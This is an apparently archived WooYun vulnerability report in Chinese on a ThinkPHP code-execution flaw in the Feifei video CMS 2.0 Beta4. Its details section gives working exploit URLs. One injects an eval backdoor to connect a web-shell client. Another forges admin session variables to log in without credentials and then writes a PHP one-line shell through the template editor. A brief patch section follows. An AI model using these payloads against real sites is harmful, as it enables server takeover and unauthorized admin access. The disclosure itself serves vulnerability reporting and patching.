漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-010518
漏洞标题:飞飞影视系统 2.0.120220(Beta4)版 thinkphp任意代码执行漏洞利用
相关厂商:飞飞电影程序v2.0
漏洞作者: 小猪。
提交时间:2012-08-03 11:46
修复时间:2012-09-17 11:46
公开时间:2012-09-17 11:46
漏洞类型:命令执行
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-08-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-17: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
看了乌云的Thinkphp 任意执行,测试下了,飞飞最新版本的。飞飞影视系统 2.0.120220(Beta4)版,说一下利用方法。
详细说明:
第一个方法 直接执行
http://www.testtest.com/index.php?s=vod-search-area-${@print(eval($_POST[c]))} .html
直接拿菜刀连接。
第二种方法:(这个好麻烦)可以执行构造SESSION,然后直接登录后台,依次执行下边三条。
在地址栏直接输入
index.php?s=vod-search-area-${@$_SESSION[AdminLogin]=1}.html
index.php?s=vod-search-area-${@$_SESSION[C(USER_AUTH_KEY)]=1}.html
index.php?s=vod-search-area-${@$_SESSION[admin_ok]=chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49).chr(44).chr(49)}.html
执行完毕登录后台。
直接地址栏输入
index.php?s=admin-index
index.php?s=Admin-Index-Top
index.php?s=Admin-Index-Top
s=Admin-Tpl-Show
/index.php?s=Admin-Cache-Show
/index.php?s=Admin-Tpl-Show-id-.|Tpl|default
拿shell,模版管理,随便点击一个模版,然后点编辑,然后输入路径,把名字改成xx.php写上一句话。
漏洞证明:
修复方案:
该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。
影响到的版本包括2.1、2.2和3.0 请对应相关版本及时更新核心程序。
下载地址:http://thinkphp.cn/download-116.html
修正方法:
首先解压缩安全补丁文件。
2.1和2.2版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Think/Util/目录下的同名文件
3.0版本
替换补丁包中的Dispatcher.class.php 文件到 ThinkPHP/Lib/Core/目录下面的同名文件
替换补丁包中的CheckRouteBehavior.class.php 文件到 ThinkPHP/Lib/Behavior/目录下面的同名文件
版权声明:转载请注明来源 小猪。@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝